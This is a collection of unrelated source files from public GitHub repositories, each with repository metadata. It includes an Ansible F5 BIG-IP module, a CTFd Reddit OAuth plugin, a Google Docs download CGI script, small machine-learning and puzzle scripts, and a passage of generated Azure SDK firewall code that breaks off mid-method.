74f18e356d9fe201db24ff1b68518f244b65d841 | c85a6d674679780ee510b5c8c3dbcbdecc859f64 | /test/test_group.py | 712c217d06209ae2dd8bfe1aca97dc90f5576fcd | [] | no_license | cbrowet-axway/APIM_sdk | d4f4a124e86a7b2e65d0ef07b54c68e95de68337 | 4f82df67ebe3dd6eae645bab8f86e72c0347ee24 | refs/heads/master | 2020-05-25T13:22:35.802350 | 2020-04-16T09:25:21 | 2020-04-16T09:25:21 | 187,820,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 894 | py | # coding: utf-8
"""
API Manager API v1.3
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.3.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.group import Group # noqa: E501
from swagger_client.rest import ApiException
class TestGroup(unittest.TestCase):
"""Group unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGroup(self):
"""Test Group"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.group.Group() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
4acd426428bf36b3e05b49f55188a9d1fb157d9d | eccda8bebcf343c6c2742980a604905135485b69 | /library/f5bigip_ltm_persistence_ssl.py | f4700fcb09e98962ecc1758d5f6d19e2c719c089 | [
"Apache-2.0"
] | permissive | erjac77/ansible-module-f5bigip | 5c920dc239098d6d3a8311da3ccb9562428a8362 | 96af6d5dc77d8ccbe18cb4fdc916625756e5f9dd | refs/heads/master | 2021-01-11T08:33:52.304903 | 2020-02-14T21:42:09 | 2020-02-14T21:42:09 | 76,477,286 | 6 | 5 | Apache-2.0 | 2018-08-09T20:41:31 | 2016-12-14T16:30:04 | Python | UTF-8 | Python | false | false | 5,650 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2016-2018, Eric Jacob <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: f5bigip_ltm_persistence_ssl
short_description: BIG-IP ltm persistence ssl module
description:
- Configures a Secure Socket Layer (SSL) persistence profile.
version_added: "2.4"
author:
- "Eric Jacob (@erjac77)"
options:
app_service:
description:
- Specifies the application service to which the object belongs.
defaults_from:
description:
- Specifies the existing profile from which the system imports settings for the new profile.
default: ssl
description:
description:
- Specifies descriptive text that identifies the component.
match_across_pools:
description:
- Specifies, when enabled, that the system can use any pool that contains this persistence record.
default: disabled
choices: ['enabled', 'disabled']
match_across_services:
description:
- Specifies, when enabled, that all persistent connections from a client IP address, which go to the same
virtual IP address, also go to the same node.
default: disabled
choices: ['enabled', 'disabled']
match_across_virtuals:
description:
- Specifies, when enabled, that all persistent connections from the same client IP address go to the same
node.
default: disabled
choices: ['enabled', 'disabled']
mirror:
description:
- Specifies whether the system mirrors persistence records to the high-availability peer.
default: disabled
choices: ['enabled', 'disabled']
name:
description:
- Specifies a unique name for the component.
required: true
override_connection_limit:
description:
- Specifies, when enabled, that the pool member connection limits are not enforced for persisted clients.
default: disabled
choices: ['enabled', 'disabled']
partition:
description:
- Specifies the administrative partition in which the component object resides.
default: Common
state:
description:
- Specifies the state of the component on the BIG-IP system.
default: present
choices: ['absent', 'present']
timeout:
description:
- Specifies the duration of the persistence entries.
default: 300
requirements:
- BIG-IP >= 12.0
- ansible-common-f5
- f5-sdk
'''
EXAMPLES = '''
- name: Create LTM SSL Persistence profile
f5bigip_ltm_persistence_cookie:
f5_hostname: 172.16.227.35
f5_username: admin
f5_password: admin
f5_port: 443
name: my_ssl_persistence
partition: Common
description: My ssl persistence profile
defaults_from: /Common/ssl
state: present
delegate_to: localhost
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible_common_f5.base import F5_ACTIVATION_CHOICES
from ansible_common_f5.base import F5_NAMED_OBJ_ARGS
from ansible_common_f5.base import F5_PROVIDER_ARGS
from ansible_common_f5.bigip import F5BigIpNamedObject
class ModuleParams(object):
@property
def argument_spec(self):
argument_spec = dict(
app_service=dict(type='str'),
defaults_from=dict(type='str'),
description=dict(type='str'),
match_across_pools=dict(type='str', choices=F5_ACTIVATION_CHOICES),
match_across_services=dict(type='str', choices=F5_ACTIVATION_CHOICES),
match_across_virtuals=dict(type='str', choices=F5_ACTIVATION_CHOICES),
mirror=dict(type='str', choices=F5_ACTIVATION_CHOICES),
override_connection_limit=dict(type='str', choices=F5_ACTIVATION_CHOICES),
timeout=dict(type='int')
)
argument_spec.update(F5_PROVIDER_ARGS)
argument_spec.update(F5_NAMED_OBJ_ARGS)
return argument_spec
@property
def supports_check_mode(self):
return True
class F5BigIpLtmPersistenceSsl(F5BigIpNamedObject):
def _set_crud_methods(self):
self._methods = {
'create': self._api.tm.ltm.persistence.ssls.ssl.create,
'read': self._api.tm.ltm.persistence.ssls.ssl.load,
'update': self._api.tm.ltm.persistence.ssls.ssl.update,
'delete': self._api.tm.ltm.persistence.ssls.ssl.delete,
'exists': self._api.tm.ltm.persistence.ssls.ssl.exists
}
def main():
params = ModuleParams()
module = AnsibleModule(argument_spec=params.argument_spec, supports_check_mode=params.supports_check_mode)
try:
obj = F5BigIpLtmPersistenceSsl(check_mode=module.check_mode, **module.params)
result = obj.flush()
module.exit_json(**result)
except Exception as exc:
module.fail_json(msg=str(exc))
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
fd9fed8d50f3bc3779e3425c4fcf511a9684675a | bd37ff289bcbe24cc6e8ab360569713b9109265d | /logistic_regression1.py | 0e62f1edd37807715a19d1310c273bd42e8e156f | [] | no_license | Sanil2108/python-machine-learning | fc035f6ddd586cf3dab9421002d4408c03b0589c | c9dbf8a1f34aa3b80c76986c742e85a9be4b2375 | refs/heads/master | 2021-01-11T09:00:28.995823 | 2017-06-18T06:08:33 | 2017-06-18T06:08:33 | 77,436,496 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,948 | py | import numpy as np
import matplotlib.pyplot as plt
all_cost=[]
def logistic(z):
return 1/(1+np.exp(-z))
def hypothesis(theta, X):
return logistic(np.array(np.matrix(X)*np.transpose(np.matrix(theta))))[0][0]
# return getY(theta, X)
def cost(theta, X, y):
m=len(y)
total=0
for i in range(m):
total+=(y[i]*np.log(hypothesis(theta, X[i])) + (1-y[i])*np.log(1-hypothesis(theta, X[i])))
return -total/m
def gradient_descent(X, y, alpha):
tempCost=1000
while(tempCost>0.01):
for j in range(len(theta)):
pd=0
for i in range(len(y)):
pd+=(hypothesis(theta, X[i])-y[i])*X[i][j]
theta[j]=theta[j]-alpha*pd
all_cost.append(tempCost)
if(tempCost-cost(theta, X, y)<1e-50):
break
tempCost=cost(theta, X, y)
print(tempCost)
print(theta)
# temp_x = np.linspace(0, len(all_cost), len(all_cost) + 1)
# for i in range(len(all_cost)):
# plt.plot(temp_x[i], all_cost[i], 'ro')
# plt.show()
return theta
#X is an (n+1) row vector
def getY(theta, X):
if(np.array(np.matrix(X)*np.transpose(np.matrix(theta)))>=0.5):
return 1
else:
return 0
# new dataset for a circular decision boundary
X = [
[1, 0, 0, 0, 0, 0],
[1, 0.5, 0.25, -0.5, 0.25, -0.25],
[1, 0.5, 0.25, 0.5, 0.25, 0.25],
[1, - 0.5, 0.25, -0.5, 0.25, 0.25],
[1, -0.5, 0.25, 0.5, 0.25, -0.25],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, -1, 1, -1],
[1, -1, 1, 1, 1, -1],
[1, -1, 1, -1, 1, 1],
[1, 0, 0, 1, 1, 0],
[1, 0, 0, -1, 1, 0],
[1, 1, 1, 0, 0, 0],
[1, -1, 1, 0, 0, 0]
]
y = [
0,
0,
0,
0,
0,
1,
1,
1,
1,
1,
1,
1,
1
]
theta = [
0,
0,
0,
0,
0,
0
]
alpha = 0.05
gradient_descent(X, y, alpha) | [
"[email protected]"
] | |
b81f580bfd884ff1bbcd428a82ed1131ae1d6e8d | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_75/717.py | 36146101c64393b9b35cbf7d17c8eadde15d28f0 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,286 | py | def solvecase(L):
C = int(L[0])
D = int(L[C+1])
N = int(L[C+D+2])
F = L[1:C+1]
X = L[C+2:C+D+2]
S = L[-1]
Q = []
for s in S:
#get spell from list
Q.append(s)
#send recent spells to check combination
if len(Q) > 1:
comb = chkcombine(F,Q[-1],Q[-2])
if comb!=None:
Q.pop()
Q.pop()
Q.append(comb)
#check for opposing spells
for i in range(len(Q)-1):
if chkoppose(X,Q[i],Q[-1]):
#destroy everything
Q = []
break
return Q
def chkcombine(formulalist,s1,s2):
for formula in formulalist:
if (formula[0]==s1 and formula[1]==s2) or (formula[1]==s1 and formula[0]==s2):
return formula[2]
return None
def chkoppose(opposelist,s1,s2):
for oppose in opposelist:
if (oppose[0]==s1 and oppose[1]==s2) or (oppose[1]==s1 and oppose[0]==s2):
return True
return False
N = int(input())
for n in range(N):
r = solvecase(input().split(' '))
print("Case #",str(n+1),": [",sep='',end='')
print(", ".join(r),sep='',end='')
print(']')
| [
"[email protected]"
] | |
97f962ce6c17f6babfe9ca499eb8d54b7c02b803 | ba1066b0860a73020eb5c4ee0021f68e3639327c | /Sujet 1/evaluation.py | 2a1b30bdb920408611258d3a5c7a66af323e27fe | [] | no_license | Hiestaa/TARP-ODNL | cf51678ce4940d2d84a167317eb70298863cc9b1 | 3a09054558ddc188f80abfd13ea51e1e99d64d68 | refs/heads/master | 2021-01-25T07:27:54.313545 | 2014-01-13T01:14:33 | 2014-01-13T01:14:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,300 | py | from machine import Machine
from task import Task
import Log
import time
import os.path
class Evaluation:
def __init__(self, tasks, sequence, id):
self.tasks = []
for ti in sequence:
self.tasks.append(tasks[ti])
self.nbtasks = len(self.tasks)
self.taskcomplete = 0
self.machinelist = None
self.time = 0
self.log = None
#self.log = Log.Log('log/last.log.html')
self.id = id
def fast(self) :
tab = []
for t in self.tasks:
copytask = []
for op in t.oplist:
copytask.append(op)
tab.append(copytask)
nbLines = len(tab[0])
nbColonnes = len(tab)
i = 1
while i < nbLines :
tab[0][i] = tab[0][i - 1] + tab[0][i]
i += 1
j = 1
while j < nbColonnes :
tab[j][0] = tab[j - 1][0] + tab[j][0]
i = 1
while i < nbLines :
if tab[j - 1][i] > tab[j][i - 1] :
tmp = tab[j - 1][i]
else :
tmp = tab[j][i - 1]
tab[j][i] = tab[j][i] + tmp
i += 1
j += 1
return tab[nbColonnes - 1][nbLines - 1]
# c = np.zeros((n + 1, m + 1))
# for i in range(1, n + 1):
# for j in range(1, m + 1):
# c[i, j] = max(c[i - 1, j], c[i, j - 1]) + tasks[order[i - 1], j - 1]
# return c[n, m]
def ontaskdone(self, task):
self.taskcomplete += 1
self.log.log_event_success(self.time, 'TaskEvent',"A task has been finished: " +str(task.id))
def onopdone(self):
self.log.log_event(self.time, 'TaskEvent', "An operation has been finished on first machine !")
if len(self.tasks):
task = self.tasks.pop(0)
task.reinit()
self.machinelist.assignTask(task, self.onopdone, self.ontaskdone)
def findUniqueName(self, name):
lst = name.split('-')
for x in range(len(lst)):
if x is not 0:
test = reduce(lambda a, b: a + '-' + b,lst[:x])
if not os.path.isfile('log/' + test + '.log.html'):
return 'log/' + test + '.log.html'
return 'log/' + name + '.log.html'
def simulation(self):
self.log = Log.Log(self.findUniqueName(self.id))
self.log.log_init_tasklist(self.tasks)
self.log.log_event_info(self.time, 'Execution', "Execution started !")
task = self.tasks.pop(0)
task.reinit()
k = 0
for op in task.oplist:
m = Machine(k, self.log)
k += 1
if not self.machinelist:
self.machinelist = m
else:
tmp = self.machinelist
while tmp.next:
tmp = tmp.next
tmp.next = m
self.log.log_event(self.time, 'Execution', str(self.machinelist.getNbMachines()) + " machines added to process operations.")
self.machinelist.assignTask(task, self.onopdone, self.ontaskdone)
while self.taskcomplete is not self.nbtasks:
#print self.time,
self.time += 1
self.machinelist.update(self.time)
self.log.log_event_success(self.time, 'Execution', "All tasks done, execution successfully done !")
self.log.log_init_machines()
m = self.machinelist
while m:
self.log.log_machine_state(m.id, m.total_working_time, m.total_waiting_time, m.work_history)
m = m.next
self.log.log_close()
return self.time
if __name__ == '__main__':
tasks = [
Task(1, [10, 40, 30]),
Task(2, [20, 50, 10]),
Task(3, [1, 5, 10]),
Task(4, [5, 20, 10]),
Task(5, [10, 15, 5])
]
seq = [4, 3, 1, 2, 0]
t = time.time()
itern = Evaluation(tasks, seq).run()
print ""
print "Evaluation time: ", time.time() - t, "s"
print "Evaluation result: ", itern, 'iterations' | [
"[email protected]"
] | |
6912f2477ca42c2d02095a157bee916ef68c2c49 | 55f67b4252ae9331b691e62e14cc055a78d23d74 | /__init__.py | a686b9d92d3e69235eae229dca1fcc8cd624f1d0 | [] | no_license | BlueSCar/ctfd-reddit-oauth | 417c0fb67425269e6bae31d4198818d7ab87442c | b4c74fdb2497387c64d481694d3b3cf59e93cbc0 | refs/heads/master | 2020-12-27T07:23:47.637438 | 2020-02-03T04:07:17 | 2020-02-03T04:07:17 | 237,813,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,309 | py | from flask import (
current_app as app,
render_template,
request,
redirect,
url_for,
session,
Blueprint,
)
from itsdangerous.exc import BadTimeSignature, SignatureExpired, BadSignature
from CTFd.models import db, Users, Teams
from CTFd.utils import get_config, get_app_config
from CTFd.utils.decorators import ratelimit
from CTFd.utils import user as current_user
from CTFd.utils import config, validators
from CTFd.utils import email
from CTFd.utils.security.auth import login_user, logout_user
from CTFd.utils.crypto import verify_password
from CTFd.utils.logging import log
from CTFd.utils.decorators.visibility import check_registration_visibility
from CTFd.utils.config import is_teams_mode
from CTFd.utils.config.visibility import registration_visible
from CTFd.utils.modes import TEAMS_MODE
from CTFd.utils.plugins import override_template
from CTFd.utils.security.signing import unserialize
from CTFd.utils.helpers import error_for, get_errors
import os
import base64
import requests
def load(app):
dir_path = os.path.dirname(os.path.realpath(__file__))
template_path = os.path.join(dir_path, 'reddit-signin.html')
override_template('login.html', open(template_path).read())
template_path = os.path.join(dir_path, 'reddit-register.html')
override_template('register.html', open(template_path).read())
template_path = os.path.join(dir_path, 'reddit-scoreboard.html')
override_template('scoreboard.html', open(template_path).read())
template_path = os.path.join(dir_path, 'reddit-scoreboard.html')
override_template('scoreboard.html', open(template_path).read())
template_path = os.path.join(dir_path, 'reddit-users.html')
override_template('users.html', open(template_path).read())
template_path = os.path.join(dir_path, 'reddit-public.html')
override_template('public.html', open(template_path).read())
@app.route("/reddit")
def reddit_login():
endpoint = (
get_app_config("REDDIT_AUTHORIZATION_ENDPOINT")
or get_config("reddit_authorization_endpoint")
or "https://ssl.reddit.com/api/v1/authorize"
)
client_id = get_app_config("REDDIT_CLIENT_ID") or get_config("reddit_client_id")
callback_url = get_app_config("REDDIT_CALLBACK_URL") or get_config("reddit_callback_url")
if client_id is None:
error_for(
endpoint="reddit.login",
message="Reddit OAuth Settings not configured. "
"Ask your CTF administrator to configure Reddit integration.",
)
return redirect(url_for("auth.login"))
redirect_url= "{endpoint}?client_id={client_id}&response_type=code&state={state}&redirect_uri={callback_url}&duration=temporary&scope=identity".format(
endpoint=endpoint, client_id=client_id, state=session["nonce"], callback_url=callback_url
)
return redirect(redirect_url)
@app.route("/reddit/callback", methods=["GET"])
@ratelimit(method="GET", limit=10, interval=60)
def oauth_redirect():
oauth_code = request.args.get("code")
state = request.args.get("state")
if session["nonce"] != state:
log("logins", "[{date}] {ip} - OAuth State validation mismatch")
error_for(endpoint="auth.login", message="OAuth State validation mismatch.")
return redirect(url_for("auth.login"))
if oauth_code:
url = (
get_app_config("REDDIT_TOKEN_ENDPOINT")
or get_config("reddit_token_endpoint")
or "https://ssl.reddit.com/api/v1/access_token"
)
client_id = get_app_config("REDDIT_CLIENT_ID") or get_config("reddit_client_id")
client_secret = get_app_config("REDDIT_CLIENT_SECRET") or get_config(
"reddit_client_secret"
)
reddit_user_agent = get_app_config("REDDIT_USER_AGENT") or get_config("reddit_user_agent")
callback_url = get_app_config("REDDIT_CALLBACK_URL") or get_config("reddit_callback_url")
client_auth = requests.auth.HTTPBasicAuth(client_id, client_secret)
headers = {"content-type": "application/x-www-form-urlencoded", "User-Agent": reddit_user_agent}
token_request = requests.post(url, auth=client_auth, data={"grant_type": "authorization_code", "code": oauth_code, "redirect_uri": callback_url}, headers=headers)
if token_request.status_code == requests.codes.ok:
token = token_request.json()["access_token"]
user_url = (
get_app_config("REDDIT_API_ENDPOINT")
or get_config("reddit_api_endpoint")
or "https://oauth.reddit.com/api/v1/me"
)
headers = {
"Authorization": "Bearer " + str(token),
"User-Agent": reddit_user_agent
}
api_response = requests.get(url=user_url, headers=headers)
log("logins", str(api_response))
api_data = api_response.json()
user_id = api_data["id"]
user_name = api_data["name"]
user_email = api_data["name"] + "@reddit.com"
user = Users.query.filter_by(name=user_name).first()
if user is None:
# Check if we are allowing registration before creating users
if registration_visible():
user = Users(
name=user_name,
email=user_email,
oauth_id=user_id,
verified=True,
)
db.session.add(user)
db.session.commit()
else:
log("logins", "[{date}] {ip} - Public registration via Reddit blocked")
error_for(
endpoint="auth.login",
message="Public registration is disabled. Please try again later.",
)
return redirect(url_for("auth.login"))
if get_config("user_mode") == TEAMS_MODE:
team_id = api_data["team"]["id"]
team_name = api_data["team"]["name"]
team = Teams.query.filter_by(oauth_id=team_id).first()
if team is None:
team = Teams(name=team_name, oauth_id=team_id, captain_id=user.id)
db.session.add(team)
db.session.commit()
team_size_limit = get_config("team_size", default=0)
if team_size_limit and len(team.members) >= team_size_limit:
plural = "" if team_size_limit == 1 else "s"
size_error = "Teams are limited to {limit} member{plural}.".format(
limit=team_size_limit, plural=plural
)
error_for(endpoint="auth.login", message=size_error)
return redirect(url_for("auth.login"))
team.members.append(user)
db.session.commit()
if user.oauth_id is None:
user.oauth_id = user_id
user.verified = True
db.session.commit()
login_user(user)
return redirect(url_for("challenges.listing"))
else:
log("logins", "[{date}] {ip} - OAuth token retrieval failure")
log("logins", str(token_request))
log("logins", str(token_request.status_code))
log("logins", token_request.json()["access_token"])
error_for(endpoint="auth.login", message="OAuth token retrieval failure.")
return redirect(url_for("auth.login"))
else:
log("logins", "[{date}] {ip} - Received redirect without OAuth code")
error_for(
endpoint="auth.login", message="Received redirect without OAuth code."
)
return redirect(url_for("auth.login"))
| [
"[email protected]"
] | |
966d74d56d048ce98e54842ab9549589742118e9 | 2a839c9f5ad608cbc6cbb7d03a8af482dcbd2956 | /cgi-bin/download.py | 49a2220a84d8090abe8d27c4ea01117f334c80cc | [] | no_license | scraperdragon/google-docs | 0a3653a10a8f4db6c419745e87c45564706405f8 | 56a6955bfbfa1acc56732356f9d828690985fce3 | refs/heads/master | 2021-01-19T15:32:38.868177 | 2015-04-17T10:55:17 | 2015-04-17T10:55:17 | 22,986,877 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,379 | py | #!/usr/bin/python
import sys
import os
import requests
import json
import urlparse
def request_with_key(url):
return requests.get(url, headers={'Authorization': 'Bearer {key}'.format(key=key)})
def output(msg):
print json.dumps(msg)
exit(0)
DRIVE_FILES_URL = "https://www.googleapis.com/drive/v2/files/{id}"
DOCUMENT_EXPORT_URL = "https://docs.google.com/feeds/download/documents/export/Export?id={id}&exportFormat={format}"
print "Content-type: application/json\n\n";
# acquire environment
if len(sys.argv) == 4:
doc_id, key, filename = sys.argv[1:]
else:
params = urlparse.parse_qs(os.environ.get("QUERY_STRING"))
doc_id, = params.get('id')
key, = params.get('key')
filename, = params.get('filename')
if not(doc_id):
output({"error": "no id"})
if not(key):
output({"error": "no key"})
if not(filename):
output({"error": "no filename"})
r = request_with_key(DRIVE_FILES_URL.format(id=doc_id))
try:
j = r.json()
except Exception:
output({"error": "response wasn't json", "error_detail":r.content, "params": params})
if 'downloadUrl' in j:
xlsx_url = j['downloadUrl']
else:
xlsx_url = j['exportLinks']['application/vnd.openxmlformats-officedocument.spreadsheetml.sheet']
xlsx_content = request_with_key(xlsx_url).content
with open(filename, 'w') as f:
f.write(xlsx_content)
output({"filename": filename})
| [
"[email protected]"
] | |
248fc2138c8eed4fa4fb235c3584ea31d3447f36 | 531c47c15b97cbcb263ec86821d7f258c81c0aaf | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_04_01/aio/operations_async/_azure_firewalls_operations_async.py | 550653dc96d84f6afaa60225d81bea644ed59841 | [
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] | permissive | YijunXieMS/azure-sdk-for-python | be364d3b88204fd3c7d223df23756386ff7a3361 | f779de8e53dbec033f98f976284e6d9491fd60b3 | refs/heads/master | 2021-07-15T18:06:28.748507 | 2020-09-04T15:48:52 | 2020-09-04T15:48:52 | 205,457,088 | 1 | 2 | MIT | 2020-06-16T16:38:15 | 2019-08-30T21:08:55 | Python | UTF-8 | Python | false | false | 21,582 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class AzureFirewallsOperations:
"""AzureFirewallsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
azure_firewall_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-04-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'azureFirewallName': self._serialize.url("azure_firewall_name", azure_firewall_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/azureFirewalls/{azureFirewallName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
azure_firewall_name: str,
**kwargs
) -> None:
"""Deletes the specified Azure Firewall.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param azure_firewall_name: The name of the Azure Firewall.
:type azure_firewall_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: None, or the result of cls(response)
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
azure_firewall_name=azure_firewall_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/azureFirewalls/{azureFirewallName}'} # type: ignore
async def get(
self,
resource_group_name: str,
azure_firewall_name: str,
**kwargs
) -> "models.AzureFirewall":
"""Gets the specified Azure Firewall.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param azure_firewall_name: The name of the Azure Firewall.
:type azure_firewall_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AzureFirewall, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_04_01.models.AzureFirewall
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.AzureFirewall"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-04-01"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'azureFirewallName': self._serialize.url("azure_firewall_name", azure_firewall_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AzureFirewall', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/azureFirewalls/{azureFirewallName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
azure_firewall_name: str,
parameters: "models.AzureFirewall",
**kwargs
) -> "models.AzureFirewall":
cls = kwargs.pop('cls', None) # type: ClsType["models.AzureFirewall"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-04-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'azureFirewallName': self._serialize.url("azure_firewall_name", azure_firewall_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'AzureFirewall')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
